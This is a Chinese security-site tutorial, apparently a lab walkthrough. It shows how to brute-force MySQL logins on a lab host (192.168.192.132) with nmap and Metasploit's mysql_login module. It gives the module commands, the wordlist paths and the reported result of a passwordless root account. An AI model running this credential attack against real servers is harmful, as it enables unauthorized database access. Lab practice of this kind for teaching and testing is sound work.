标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-3337]   作者: 影 发表于: [2023-09-13]

本文共 [42] 位读者顶过

1 环境搭建

   攻击机:kali

    靶机IP:192.168.192.132 [出自:jiwo.org]

  搭建好环境后,使用nmap探测MySQL环境,命令为:nmap 192.168.192.132,确认3306端口已开启。

2 破解过程

2.1 在终端输入msfconsole即可进入msf控制台

2.2 搜索关于MySQL的模块

    search mysql

2.3 使用mysql_login模块进行破解

使用模块:use 16 (此模块的序号为16)

显示参数:show options

配置参数:

     set RHOSTS 192.168.192.132     //配置远程MySQL服务器的IP地址

     set USER_FILE  /home/kali/Desktop/director/zzzu.txt      //爆破的用户名字典文件路径

     set PASS_FILE  /home/kali/Desktop/director/zzzp.txt      //爆破的密码字典文件路径

     set STOP_ON_SUCCESS true    //得到正确的用户名和密码后停止运行

运行模块:run

破解成功,得到正确的用户名为root,没有密码。

评论

暂无
发表评论
 返回顶部 
热度(42)
 关注微信